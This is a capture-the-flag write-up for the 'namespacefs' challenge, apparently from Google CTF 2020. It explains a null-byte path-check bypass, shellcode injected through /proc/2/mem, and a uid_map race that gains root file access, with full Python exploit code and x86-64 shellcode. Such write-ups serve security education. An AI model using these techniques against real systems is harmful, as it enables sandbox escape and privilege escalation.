- Original Description
- The task
- Step 1: path check
- Step 2: sandboxed RCE
- Step 3: namespace and fsuid shenanigans
- Exploit code
Original Description
A remote filesystem with protobufs and namespace-based security. You can find the flag at /home/user/flag (read-only by root)
The task
The task is essentially a single C++ daemon that does the following:
- Starts as root (uid 0)
- Forks a sandbox process:
- Does a
- Mounts a
/tmp in the new namespace
- Setuids to 1338 using
- Sets uid and gid maps from the parent to only allow UID 0 and UID 1338
- Starts a very basic
- Does a
- Drops all capabilities
- Starts serving two kinds of requests with a simple protobuf serialization:
- Write to a file. Parameters are filename, data and offset
- Read from a file. Parameters are filename, size and offset
- The trick is that each operation is handled by first jumping into a sandbox:
- fork() is called, along with a waitpid() in the parent
- The child attaches to the user namespace of the sandbox process
- setfsuid()s to uid 1338
- Attaches to the MNT and NET namespaces of the sandbox too
- Then does the operation
- Reading a file is done with a vanilla ifstream
- Writing to a file is a bit more complicated:
- The string is split at
/ is opened and set as the current fd
- For each string part, mkdirat() is called, and if it returns with EEXIST, it is just
- The last part is
- A stream is created from the returned fd
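The component-by-component walk used for writes can be sketched roughly as follows. This is a minimal Python illustration, not the daemon's C++ code: the name `open_for_write`, the file modes, and the behaviour on EEXIST (simply descending into the existing directory) are assumptions made for the example.

```python
import os
import tempfile

def open_for_write(root, path):
    """Walk `path` one component at a time below `root` (hypothetical helper)."""
    cur = os.open(root, os.O_RDONLY | os.O_DIRECTORY)
    parts = [p for p in path.split("/") if p]
    for part in parts[:-1]:
        try:
            os.mkdir(part, 0o755, dir_fd=cur)  # mkdirat() relative to the current fd
        except FileExistsError:
            pass  # EEXIST: assumed to just descend into the existing directory
        nxt = os.open(part, os.O_RDONLY | os.O_DIRECTORY, dir_fd=cur)  # openat()
        os.close(cur)
        cur = nxt
    # The last component is the file itself.
    fd = os.open(parts[-1], os.O_WRONLY | os.O_CREAT, 0o644, dir_fd=cur)
    os.close(cur)
    return fd

with tempfile.TemporaryDirectory() as root:
    fd = open_for_write(root, "a/b/c.txt")
    os.write(fd, b"hello")
    os.close(fd)
    with open(os.path.join(root, "a", "b", "c.txt"), "rb") as f:
        print(f.read())
```

Note that a ".." component goes through the same loop: mkdirat() reports EEXIST for it, and the walk then steps up one directory.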
Step 1: path check
Both operations first check the "path" parameter of the operation by running strstr(s, "..") on the c_str() of the string. This is vulnerable to null-byte injection: both protobuf and C++ strings store an explicit length and may therefore contain 0 bytes, while strstr() stops at the first one. So the following path will be accepted:
Unfortunately this only works for writing files, because of how the recursive creation function is constructed: it splits the full string into parts, so the parts after the null byte are still processed.
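The mismatch between the check and the write path can be emulated in a few lines of Python. This is only a model of the behaviour described above: `c_str`, `path_check_passes` and `write_components` are hypothetical names, and the example path is the one used later in the exploit.

```python
def c_str(s):
    """What a C string function sees: everything up to the first NUL byte."""
    return s.split(b"\0", 1)[0]

def path_check_passes(path):
    # Emulates strstr(path.c_str(), "..") == NULL
    return b".." not in c_str(path)

def write_components(path):
    # Emulates splitting the full length-prefixed string on '/',
    # then passing each part to a C API such as mkdirat()
    return [c_str(part) for part in path.split(b"/")]

path = b"dummy\0/../../../../../proc/2/mem"
print(path_check_passes(path))   # the check only sees b"dummy"
print(write_components(path))    # the walk still sees every ".." component
print(c_str(path))               # a plain open() on c_str() would only see b"dummy"
```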
Step 2: sandbox process RCE
Now that we can write any file, we might as well overwrite the only thing we can actually overwrite without proper capabilities: the memory of the sandbox process. This process is always at pid 2 in the task-running infrastructure, and its code is not randomized by ASLR, so we can write the shellcode straight into its while loop:
do_write("dummy\0/../../../../../proc/2/mem", SHELLCODE, offset=0x401B9B)
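The reason the offset doubles as a target address is that /proc/<pid>/mem is indexed by virtual address. A minimal, Linux-only sketch of that mechanism, patching a buffer in the current process rather than pid 2 (the buffer and its contents are made up for the example):

```python
import ctypes

# A buffer in our own address space stands in for the sandbox's code.
buf = ctypes.create_string_buffer(b"AAAAAAAA")
addr = ctypes.addressof(buf)

# Seeking to a virtual address and writing there modifies that memory.
with open("/proc/self/mem", "r+b", buffering=0) as mem:
    mem.seek(addr)
    mem.write(b"patched!")

print(buf.raw[:8])
```

In the exploit the same thing happens through the daemon's write operation, with the path pointing at /proc/2/mem and the offset set to the address of the loop.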
We have to be careful, however: this process must not exit, because that would destroy the namespaces that the original daemon uses.
Unfortunately this process does not have access to much, so we still have to PWN the UID 0 process somehow.
Step 3: namespace and fsuid shenanigans
At this stage, even if we create a symlink to the root directory under /tmp to get an arbitrary read, we still can't read the flag, as it is probably chown 0:0 and chmod 400, and fsuid is set to 1338 before every operation.
But there is a way to make this work: with UID maps.
First, we create one more layer of namespaces from the sandbox process by calling
Then, from the original daemon, since we are still root, we can set almost any UID map as long as it is a subset of the parent UID map. (Setting the uid_map from the unprivileged process is far more restricted.)
So we set the following:
1338 0 1
0 1338 1
The above map will swap root and the unprivileged user. This is necessary, because both users are used, and these maps cannot overlap in source or destination.
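To see what the swap does, recall that each uid_map line has the form "ID-inside-ns ID-outside-ns length". The following sketch translates a UID from the new namespace to its parent; `parse_uid_map` and `to_parent` are hypothetical helper names, not kernel or library APIs.

```python
def parse_uid_map(text):
    """Parse uid_map lines of the form: <id inside ns> <id outside ns> <length>."""
    entries = []
    for line in text.strip().splitlines():
        inside, outside, count = map(int, line.split())
        entries.append((inside, outside, count))
    return entries

def to_parent(entries, uid_inside):
    """Translate a UID seen inside the namespace to the parent namespace."""
    for inside, outside, count in entries:
        if inside <= uid_inside < inside + count:
            return outside + (uid_inside - inside)
    return None  # unmapped

swap = parse_uid_map("1338 0 1\n0 1338 1\n")
print(to_parent(swap, 1338))  # 0
print(to_parent(swap, 0))     # 1338
```

So UID 1338 inside the new namespace corresponds to UID 0 in the parent, and the other way round.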
This is a bit hard, since this has to be done with a race:
- The daemon has to start processing the Write request, and enter the namespace
- Then the sandbox process has to do the unsharing (which makes it impossible for anyone to enter that user namespace again until the uid_map is filled)
- Then the daemon needs to actually write the uid_map
After a few tries it usually works though.
When all this is set up, calling setfsuid(1338) from the daemon after it has entered this namespace will actually cause it to have UID 0 as the fsuid in the root namespace, allowing it to read files as root.
(TBH I'm surprised it did not explode at this point)
A simple read through the root symlink will then give the flag:
Exploit code
The following Python code was used, after generating the Python version of the supplied protobuf schema:
```python
#!/usr/bin/env python3
import struct
import sys
import time

import nsfs_pb2  # generated from the supplied protobuf schema


def do_operation(operation):
    # Each request is a 4-byte length prefix followed by the serialized message.
    operation_as_str = operation.SerializeToString()
    sys.stdout.buffer.write(struct.pack("I", len(operation_as_str)))
    sys.stdout.buffer.write(operation_as_str)
    sys.stdout.buffer.flush()


def do_write(path, data, offset=None):
    operation = nsfs_pb2.Operation()
    operation.action = nsfs_pb2.WRITE
    operation.path = path
    operation.data = data
    if offset is not None:
        operation.offset = offset
    do_operation(operation)


def do_read(path, length):
    operation = nsfs_pb2.Operation()
    operation.action = nsfs_pb2.READ
    operation.path = path
    operation.length = length
    do_operation(operation)


EXECVE_SH = b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
SYMLINK_ROOT = b"\x48\x31\xd2\x48\x31\xf6\xbb\x2f\x00\x00\x00\x53\x48\x89\xe7\x48\xbb\x2f\x74\x6d\x70\x2f\x72\x00\x00\x53\x48\x89\xe6\xb0\x58\x0f\x05"
UNSHARE_USERNS = b'\xbf\x00\x00\x02\x50\x66\xb8\x10\x01\x0f\x05'
STOP = b'\xeb\xfe'

# Sanity checks: plain write and read.
do_write("dummy1", b"lel")
do_read("dummy1", 1000)
do_read("r/tmp/dummy1", 1000)

# Step 2: patch the sandbox process (pid 2) through /proc/2/mem.
do_write("dummy\0/../../../../../proc/2/mem", SYMLINK_ROOT + UNSHARE_USERNS + STOP, 0x401B9B)
time.sleep(0.9)

# Step 3: race the unshare() and fill in the swapped uid_map.
for _ in range(100):
    do_write("dummy\0/../../../../../proc/2/uid_map", b"1338 0 1\n0 1338 1\n")
time.sleep(1)

# Read the flag through the /tmp/r -> / symlink.
do_read("r/home/user/flag", 1000)
```
The shellcodes roughly correspond to the following assembly code:
```
section .text
global _start
_start:
    xor rdx, rdx
    xor rsi, rsi
    mov rbx, '/'
    push rbx
    mov rdi, rsp
    mov rbx, '/tmp/r'
    push rbx
    mov rsi, rsp
    mov al, 88              ; symlink syscall
    syscall
    mov rdi, 0x50020000     ; CLONE_NEWUSER + CLONE_NEWNET + CLONE_NEWNS
    mov ax, 272             ; unshare syscall
    syscall
infinite:
    jmp infinite
```
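As a quick cross-check, the immediate operands can be decoded directly from the UNSHARE_USERNS bytes in the exploit script. The sketch below assumes the standard Linux x86-64 values for the CLONE_* flags and the unshare syscall number.

```python
import struct

# Linux clone flags (values from <linux/sched.h>)
CLONE_NEWNS = 0x00020000
CLONE_NEWUSER = 0x10000000
CLONE_NEWNET = 0x40000000

UNSHARE_USERNS = b'\xbf\x00\x00\x02\x50\x66\xb8\x10\x01\x0f\x05'

# bf imm32     -> mov edi, imm32 (flags argument)
# 66 b8 imm16  -> mov ax, imm16  (syscall number)
flags = struct.unpack_from("<I", UNSHARE_USERNS, 1)[0]
syscall_nr = struct.unpack_from("<H", UNSHARE_USERNS, 7)[0]

print(hex(flags))
print(syscall_nr)
print(flags == CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS)
```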
It was run as ./solution.py | nc namespacefs.2020.ctfcompetition.com 1337, and it usually works in a few tries.